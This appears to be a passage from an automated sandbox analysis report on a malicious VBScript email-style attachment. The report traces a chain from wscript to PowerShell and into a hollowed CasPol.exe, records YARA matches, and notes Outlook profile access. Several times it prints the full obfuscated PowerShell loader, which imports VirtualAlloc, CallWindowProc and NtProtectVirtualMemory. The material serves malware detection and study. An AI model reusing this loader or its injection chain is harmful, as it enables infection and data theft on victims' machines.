NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
            Source: Initial file: semirattlesnake.ShellExecute Angularises, " " & chrw(34) & Eu8 & chrw(34), "", "", 0
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728
            Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4728Jump to behavior
            Source: SIEM_PO00938467648.vbs, type: SAMPLEMatched rule: WScript_Shell_PowerShell_Combo date = 2018-02-07, author = Florian Roth, description = Detects malware from Middle Eastern campaign reported by Talos, score = 15f5aaa71bfa3d62fd558a3e88dd5ba26f7638bf2ac653b8d6b8d54dc7e5926b, reference = http://blog.talosintelligence.com/2018/02/targeted-attacks-in-middle-east.html, license = Detection Rule License 1.1 https://github.com/Neo23x0/signature-base/blob/master/LICENSE
            Source: Process Memory Space: powershell.exe PID: 6160, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008EEB286_2_008EEB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008EEB286_2_008EEB28
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008ECEB96_2_008ECEB9
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_008ECEC86_2_008ECEC8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DE7B06_2_079DE7B0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079D71806_2_079D7180
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079D91C86_2_079D91C8
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_079DE7A06_2_079DE7A0
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 6_2_07B429F06_2_07B429F0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA06BE012_2_1FA06BE0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA0E5EB12_2_1FA0E5EB
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA08B7012_2_1FA08B70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1FA08C5012_2_1FA08C50
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B703012_2_203B7030
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BAC7012_2_203BAC70
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BC49012_2_203BC490
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B94D012_2_203B94D0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B451012_2_203B4510
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BDE1012_2_203BDE10
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B668812_2_203B6688
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203B0ACA12_2_203B0ACA
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_203BECD012_2_203BECD0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_2049154012_2_20491540
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_20492D6812_2_20492D68
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_2049381012_2_20493810
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204950D812_2_204950D8
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_2049458A12_2_2049458A
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204948A012_2_204948A0
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204911C212_2_204911C2
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_204914D412_2_204914D4
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B206 NtQuerySystemInformation,12_2_1D63B206
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63B1D5 NtQuerySystemInformation,12_2_1D63B1D5
            Source: SIEM_PO00938467648.vbsInitial sample: Strings found which are bigger than 50
            Source: C:\Windows\System32\wscript.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: edgegdi.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: security.dllJump to behavior
            Source: SIEM_PO00938467648.vbsReversingLabs: Detection: 34%
            Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
            Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEn
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdline
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exe
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\WindowsJump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Biliate = """LaABrdGedGa-StTDiyCopsteUn St-UdThoyAupepeWrDReeTrfPaiUsnUmiRetCoiMaoFrnSv Sm'ReuSksUniFunCogKn ToSPhyPrsJatNueSimst;viuSmsPriSknangIm PrSPlyEusGrtgueoemFo.ReRPuuConHutSoiFrmFreIl.JoIFonSntSneLurCooPapJaSTreRerElvKuiticReeFesBr;AmpUpuKobsnlVoiDecAw sasRutRhajetaaiTecSv BrcEslFoaUnsVasLe EbTInuBaeBaiOurCeoKonPr1Ci Sh{Ti[PhDAflUllBuIMimHapMaoAfrEutAn(ad`"""InuLusKieKarMe3Br2Si`"""Rr)Ri]GopMauFlbStlMeiTycSa AesKatInaHjtSmiSvcNe SteHoxattImeTerOpnNa GriBenBrtNo YdDMieResTotEnrBroStyOvCspaMerMieCotKl(sn)Me;Sm[AfDEplLulReIenmFlpRdoHarEgtBr(Ov`"""MigAldMeiPl3In2Er`"""Te)Ce]tapEuuDrbCulMaiHjcAs LgsUdtTraBrtSqiercCo VieBexTetVeetrrHrnMa FoiBanArtHa StSBrcUdaGrlLaeSkWTeiScnSudReoBuwCrEVexChtstESuxKn(NoiFinKutSe MoDLnrIgiBefRatPl,ReiAnnAltJu BeAUdmAmbMiuPalHeaAp,DiiFonKntSp juBpraSesVaoQu,MaiLenImtBa NoiAfaDagVrtPotSyaOv,ChiGenpltRe diVSaeTvjSimboaSotAn1Un5Fr8Ud,GiiTinSttEr YeMSucSlgKurSk)Eg;Ak[KuDDilBulImIRdmAmpAnoVarPrtFr(Sk`"""SvkSqeRorpinFleRelPa3Ov2as`"""Tr)Wo]hepMeuRobBalFriLucRe HysMitFoaUntTaiTmcJa aneDexMitKueSarBlnOi ReiFanSutov drHDeeStaBapBlSBeiSpzBaeKo(StiUnnDitOu YcPKerBroUrpRe,PhiSonxatCl AiANodStrCheFosOv,ViiDenJutDi MuTImoWerArtInrfriPo)Mo;Co[SlDOplSalSpIApmunpReoSjrRotKo(wh`"""JgsSchdieBilShlko3Ge2re.VadUflOmlUn`"""St)Un]BepPauSlbOslBeiUncAs MasMntSyaLetFriTrcpr NoeVixRatFoeRerWenun SevEnofuiTrdRh PaDterFlaFigMeFCiiEnnStiKasBehMi(EsiBonSutPo OpOMumPldSerGe)Ba;Ej[SpDFalBelMeILimhepFroUdrGutAu(Je`"""mawSkifanTemNumIn.ApdKolBolFl`"""Fu)Ho]ScpOvuPrbMdlViiAlcBa BosSatAsaHotLiiFocSi VeeNoxLutHaeBirJenLa HoiennNatGu ArmtjiHoxSceDarTrGSwejotCoDTreFivSuCKeaMipqusSu(SkiBlnCitCh BeNPriBrtSerUd,UditinCotJo VaFaseEwlOb,ThivinQutEo NoAPhfAfsXi9Im3Bl)Ta;Ls[ChDCulCalHaIPumCipIcoFarRetSl(Be`"""RekGleTrrhinAteSilEk3Sa2ur`"""Ti)De]PapFeuDrbFolOpiLkcTn BusAbtSyaUdtMeiSocfr CoeImxFatMoeFrrnanto triMenTotAl KaLUdoEscAskQuRosepasphoOvuForJucApeph(RoiAfnCotTe VeLExeSoiUn)Ir;Un[ReDPilIwlOyILammipShoStrFatCr(Bo`"""FlkAueCervanToeJelAv3Pl2Re`"""Se)Co]UnpAnuCobOplFoilacLa CasrotOpaUntMuiKacTi WieKnxEntReeUdrTrnTr AriPonIntSl PiVIniStrpetrauAcaTilvaATelBelCloThcFa(TriStnSotWi GevGr1Sk,SmiLunThtOr CavBl2Ne,KeiStnCotBy Hevdr3pa,HeiGanUptku SvvCa4In)pr;Py[DrDMalInlPrIBrmHepPloKnrPttba(Ho`"""CrAUnDBeVAlAToPanICr3St2Ph.WaDBeLSaLCi`"""To)Un]StpTiuRebSylPuiEncFo CosMotUnaUntHuiAtcst MeeMixDotOfeAdrInnRo SuvBeoUpiVidTi CiMTraBipBeGAteOenSleGlrPriBrcCoMFiaUnsAnkVn(SaiSknMetPe PlBInrTriOdnObkIr,DoiDenQutRu CaMChiUddtitKnsSn)In;Ov[TrDRelSelFuIUnmRipGoosurOmtSc(Ve`"""BrkVaeMerManPeeSklSt3Co2In`"""ef)Ce]BepKouMybKolLbiCocUn EdsGatKuaTetKoiaacLu NoeVexPrtNeeUnrAnnCy PrISenLvtPlPFotBorkr ScEGanSuumemfuSChyFrsPotBeeOomFjLGuoFlcSraNelGaeVosPrWUn(PauDiiEynSttPe GrvEx1ma,PsiHanKotEn KovGr2Ha)Et;Om[OoDrhlDilFlIsumEnpSkoOvrTrtSp(St`"""ObkEdeElrRenTaeDalDi3Sc2Di`"""Si)Ni]FopChuTlbDalCaiAlcLi SmsNytvaaretPriSucTr LueBexGatTreGerManbr ReiGunentAn UnSGieUntTiTEnJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\0j5ctfzr\0j5ctfzr.cmdlineJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exe C:\Windows\Microsoft.NET\Framework\v2.0.50727\caspol.exeJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES7743.tmp" "c:\Users\user\AppData\Local\Temp\0j5ctfzr\CSC3A80B568F8BB4D66897E5CE811419E16.TMP"Jump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AAB6 AdjustTokenPrivileges,12_2_1D63AAB6
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeCode function: 12_2_1D63AA7F AdjustTokenPrivileges,12_2_1D63AA7F
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ch5v15x.nhz.ps1Jump to behavior
            Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@13/10@3/3
            Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\e4a1c9189d2b01f018b953e46c80d120\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\ffc00a26ff38e37b47b2c75f92b48929\mscorlib.ni.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlpJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlpJump to behavior
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:120:WilError_03
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3372:304:WilStaging_02
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:380:304:WilStaging_02
            Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SIEM_PO00938467648.vbs"
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
            Source: C:\Windows\Microsoft.NET\Framework\v2.0.50727\CasPol.exeFile opened: C:\Windows\WinSxS\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.9672_none_d08f9da24428a513\MSVCR80.dllJump to behavior
